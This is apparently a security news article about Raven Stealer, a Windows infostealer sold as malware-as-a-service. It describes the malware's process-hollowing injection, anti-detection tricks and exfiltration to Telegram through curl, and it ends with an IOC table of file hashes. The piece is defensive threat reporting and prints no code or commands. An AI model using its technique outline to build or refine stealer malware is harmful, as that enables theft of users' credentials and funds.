A new information-stealing malware, dubbed Raven Stealer, has emerged as a significant threat in the commodity malware landscape.
Developed predominantly in Delphi and C++, Raven Stealer embodies the modern trend of lightweight, modular infostealers that emphasize operational stealth and attack automation.
The malware is actively distributed through GitHub and a dedicated Telegram channel operated by the so-called ZeroTrace Team, whose aggressive push into the malware-as-a-service (MaaS) space is underlined by a well-maintained portfolio that includes another infostealer, Octalyn Stealer.
Raven Stealer targets Windows systems and primarily focuses on exfiltrating sensitive data from Chromium-based browsers such as Google Chrome, Brave, and Edge.
Its feature set includes harvesting passwords, cookies, autofill data, and stored payment card information.
In addition to browsers, it can reach out to cryptocurrency wallets and select desktop applications, with the explicit aim of gathering credentials and financial data.
The malware’s design is highly attacker-friendly a Delphi-based builder tool offers a GUI for payload customization, allowing operators to easily embed Telegram bot tokens and chat IDs for real-time C2-like communications.
The compiled payloads, written in C++, are typically packed using UPX to shrink their footprint and evade basic static analyses. Once executed on a victim’s machine, Raven Stealer employs several anti-detection techniques.
It, for example, removes itself from the taskbar and suppresses any visible UI, leveraging Windows API calls to make the process invisible to users.
Configuration details such as Telegram tokens are embedded into resources within the binary, further complicating detection and analysis.
Analysts note a high entropy in unpacked samples, signifying deliberate obfuscation and the presence of encrypted resource payloads most notably a ChaCha20-encrypted DLL used for injection.
Technical Workflow
The main operational workflow revolves around advanced memory manipulation and process injection. Raven initiates a new Chromium browser instance in a suspended, headless state, equipped with flags like –no-sandbox for easier exploitation.
Using direct syscalls, it performs reflective process hollowing to inject its decrypted, in-memory DLL payload into this suspended process circumventing security hooks and allowing the malware to steal browser credentials and other sensitive data without writing to disk.
Credential and artifact gathering spans a comprehensive range: passwords, cookies, payment information from browsers, cryptocurrency wallet files, and even screenshots of the victim’s desktop.
According to the Cyfirma report, the data is methodically sorted under the victim’s AppData directory, enabling systematic harvesting and later exfiltration.
Raven Stealer’s final stage involves compressing all collected data into a ZIP archive often named with the infected user’s credentials and uploading it to the attacker’s specified Telegram chat.
This is accomplished via the Telegram Bot API, with curl.exe invoked to automate document uploads through the attacker’s embedded bot ID and chat token.
This approach replaces traditional C2 infrastructure and capitalizes on Telegram’s anonymity, rapid data transmission, and seamless integration.
Threat Landscape
Attribution points to the ZeroTrace Team, which coordinates development, distribution, and support via an active Telegram channel and GitHub repository.
Metadata and hardcoded author tags within Raven Stealer’s code, together with a persistent online presence, demonstrate deliberate branding and ongoing evolution of the toolset.
The same infrastructure is leveraged to advertise related infostealers, indicating a concerted strategy to dominate the low-tier MaaS market through rapid brand diversification and regular feature updates.
Raven Stealer reflects the risks posed by readily available, modular info-stealing malware: attackers with minimal technical skill can now deploy formidable data-harvesting campaigns with little more than a Telegram account and access to open-source repositories.
Its real-time exfiltration methods, advanced stealth, and aggressive promotion across illicit channels position it as a substantial ongoing threat to enterprise and consumer security.
Indicators of Compromise (IOC)
| S. No. | Indicator | Type | Context |
|---|---|---|---|
| 1 | 2e0b41913cac0828faeba29aebbf9e1b36f24e975cc7d8fa7f49212e867a3b38 | EXE | RavenStealer.exe |
| 2 | 28d6fbbdb99e6aa51769bde016c61228ca1a3d8c8340299e6c78a1e004209e55 | EXE | v8Axs07p.3mf.exe |
| 3 | 252fb240726d9590e55402cebbb19417b9085f08fc24c3846fc4d088e79c9da9 | DLL | PAYLOAD_DLL.dll |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
